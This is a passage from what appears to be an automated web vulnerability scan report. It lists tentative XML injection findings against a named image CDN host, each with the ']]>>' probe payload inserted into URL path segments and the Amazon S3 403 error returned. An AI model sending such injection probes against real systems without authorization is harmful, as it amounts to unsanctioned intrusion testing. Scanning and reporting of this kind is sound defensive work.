x-amz-id-2: 1S5DCQ+qZWhWf5rVYqawlnwRRL6782hgVaS3YWALYppVIvFV2uaQVktP6iCnbafP
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 88549d51be3a35f997bf45c7af6112c3dea5b8431daa32f85aceb01b13672bcad92bf0fbf23c35bb
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>390F74F86C68625C</RequestId><HostId>1S5DCQ+qZWhWf5rVYqawlnwRRL6782hgVaS3YWALYppVIvFV2u
...[SNIP]...

8.94. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 66AB3CBF8B44F0B6
x-amz-id-2: Y+DXDjulDW4KVSHcYzwY5lqwnHu+gMY8TdwWpSvBKrdNbedasYOcysGbG5nAPsbB
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:02 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 79a94b86914fa1043fa9e531fb36b91de8c1816433f5458d4ea18976039a3c712c734cd2e0860b6e
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>66AB3CBF8B44F0B6</RequestId><HostId>Y+DXDjulDW4KVSHcYzwY5lqwnHu+gMY8TdwWpSvBKrdNbedasY
...[SNIP]...

8.95. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BCE770010370D439
x-amz-id-2: yXLSy7a5egZ1oySscYmJgg78Wmmd4Qtl0TfLy9N3+yMTLq9H7azBDmIsJ8QWJ2nt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:43 GMT
Server: AmazonS3
Content-Length: 231
Age: 92
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9397855e4b02e3a8d755a382bf53c6ec243cfd7e456e88b3d1b6408c5196d2df2dd0cb133105b22b
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BCE770010370D439</RequestId><HostId>yXLSy7a5egZ1oySscYmJgg78Wmmd4Qtl0TfLy9N3+yMTLq9H7a
...[SNIP]...

8.96. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9424DDABF6B3EB85
x-amz-id-2: NekkuvI5cQBgIumpBRlKhph9W6DAmsb1MatESnfat55T00kL5hOTirUw3f4HUhyJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Content-Length: 231
Age: 99
X-Cache: Error from cloudfront
X-Amz-Cf-Id: fe28f00686e92fc13e2c8d60fffdf99e5a5137b24f2825598fe1b62df6fda0b036e1afb076931f67
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9424DDABF6B3EB85</RequestId><HostId>NekkuvI5cQBgIumpBRlKhph9W6DAmsb1MatESnfat55T00kL5h
...[SNIP]...

8.97. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AD5969C5272C5072
x-amz-id-2: /XbEdueLcFmUMMWYDUVVSHwRsSjxDxKKJJajeCWf6uAWF0VfJkLgI0fOTq1qy0RC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:48 GMT
Server: AmazonS3
Content-Length: 231
Age: 101
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f7d75effa07e7013335d239cdafed378dd26cc9715aad5442146b6373d271cfbb0d40f45f6712268
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AD5969C5272C5072</RequestId><HostId>/XbEdueLcFmUMMWYDUVVSHwRsSjxDxKKJJajeCWf6uAWF0VfJk
...[SNIP]...

8.98. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-2.f6img.com

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9E1EBADA150E2C6C
x-amz-id-2: Z79G2Gwb68wDM8R/9OLave0TNoQGtMXsfDu5eVLy23STfQGkLqD7Nr2gSOWS+Yiy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:18 GMT
Server: AmazonS3
Content-Length: 231
Age: 47
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4ff5b13ad442e811e4bbbabe988fee860f17bed21f13b7b4598279137b6dc095c008d0fc84a6fa4f
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9E1EBADA150E2C6C</RequestId><HostId>Z79G2Gwb68wDM8R/9OLave0TNoQGtMXsfDu5eVLy23STfQGkLq
...[SNIP]...

8.99. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-2.f6img.com

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6C13D5704545D95B
x-amz-id-2: oLdzht6GSIIiakC+4WfMjJaSMtXe412IUMKyfhCRl95gMgNm/4pXCRebcYc4l25y
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:22 GMT
Server: AmazonS3
Content-Length: 231
Age: 44
X-Cache: Error from cloudfront
X-Amz-Cf-Id: fb99379fca63b9151bd9a41dda98fb168d81862e7508a959d4d76210dff835a7a5ea75f16865c635
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6C13D5704545D95B</RequestId><HostId>oLdzht6GSIIiakC+4WfMjJaSMtXe412IUMKyfhCRl95gMgNm/4
...[SNIP]...

8.100. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-2.f6img.com

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F1122D085F1BF757
x-amz-id-2: 8UOZsQXbwQkw38ECJb6Lo+aw2xaHBT+74nVt/uJ0rA/yVaDEYdSJjMGMaL/hnxC8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:25 GMT
Server: AmazonS3
Content-Length: 231
Age: 42
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3a4b36f1d4ba1b1b73b23883119b2fd2e91e620b8d2780fe1fe492153a62566aff40722cd988941c
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F1122D085F1BF757</RequestId><HostId>8UOZsQXbwQkw38ECJb6Lo+aw2xaHBT+74nVt/uJ0rA/yVaDEYd
...[SNIP]...

8.101. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-2.f6img.com

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 301F2BF9BC988511
x-amz-id-2: okOT+aukvO9gWm2huDe4R+1Gbyxjgxux0b9FGIiKiYcI2z2O0vLfhfAdtsQXxhDQ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:27 GMT
Server: AmazonS3
Content-Length: 231
Age: 41
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 272ec9ab295e1482d91208f8a1f254c0ad896c9aecee6e5f7810b84175668ebb708817e9df66926c
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>301F2BF9BC988511</RequestId><HostId>okOT+aukvO9gWm2huDe4R+1Gbyxjgxux0b9FGIiKiYcI2z2O0v
...[SNIP]...

8.102. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-663333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 28C0BA480CF00508
x-amz-id-2: +y0x/8vyrQ8Lhg78qhrIIWku4qMHcKnfiUn6kqHwGJHpiqfctq/CXTLwK04PVTzu
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:59 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7daa3a6aebaf1ed5374b2268094f848bc1a742c4be8d5b31cdfc62ca5a64ac048ec3b0c39e6bb678
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>28C0BA480CF00508</RequestId><HostId>+y0x/8vyrQ8Lhg78qhrIIWku4qMHcKnfiUn6kqHwGJHpiqfctq
...[SNIP]...

8.103. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-663333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F56DBE9BC62E4800
x-amz-id-2: Zz1O/YAK6J/0YDg/vf+BL6rU7NLE/A4eBu+bX8Oevf4xqgIXpFdkO6nJuLm/CmcJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:11 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f11308a4d17ad195ffc40ed27361a7e6a749e9691ca9093e0ebc79f39ea265340934e9ece0409398
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F56DBE9BC62E4800</RequestId><HostId>Zz1O/YAK6J/0YDg/vf+BL6rU7NLE/A4eBu+bX8Oevf4xqgIXpF
...[SNIP]...

8.104. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-663333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FE4F4B23CB3BBE68
x-amz-id-2: laz31JBpy+X8XDcTJ3qGfs3A7EgPjNCOQakP3nx+nIMp5DipSUQUyHpLcO8tjodh
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:17 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 124b70105e3ed77700ea547ff37bd26a15fbb53d199acf86991ee4ea90a6989675042b1c84a0e723
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FE4F4B23CB3BBE68</RequestId><HostId>laz31JBpy+X8XDcTJ3qGfs3A7EgPjNCOQakP3nx+nIMp5DipSU
...[SNIP]...

8.105. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7479C788C3AF8D5D
x-amz-id-2: XDv1vsUSblAlIHWhWmkFqTjmqCEpF/18UGnUlNpVd8EnvRBKg5DKhU/q2Qk1WQE0
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:24 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8291f8e26c23bf0113f70da359ca763870633d35a57ac2a5382f2582e829c781c0b4e56fd6f607f3
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7479C788C3AF8D5D</RequestId><HostId>XDv1vsUSblAlIHWhWmkFqTjmqCEpF/18UGnUlNpVd8EnvRBKg5
...[SNIP]...

8.106. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-993333-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7AC5FCFD2A65E078
x-amz-id-2: lmj+XTfT9doKgx84qqMt4LUrEJoLAWQNgXcWxtO8jNLkk3sFBE8+g+3Rek4qzsK9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 91e166d303f498a8f8df5ccb55626c7d8a26ac6b9eef3c1dac8fdcaaad5ab4471d93c646fa558687
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7AC5FCFD2A65E078</RequestId><HostId>lmj+XTfT9doKgx84qqMt4LUrEJoLAWQNgXcWxtO8jNLkk3sFBE
...[SNIP]...

8.107. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png

Issue detail

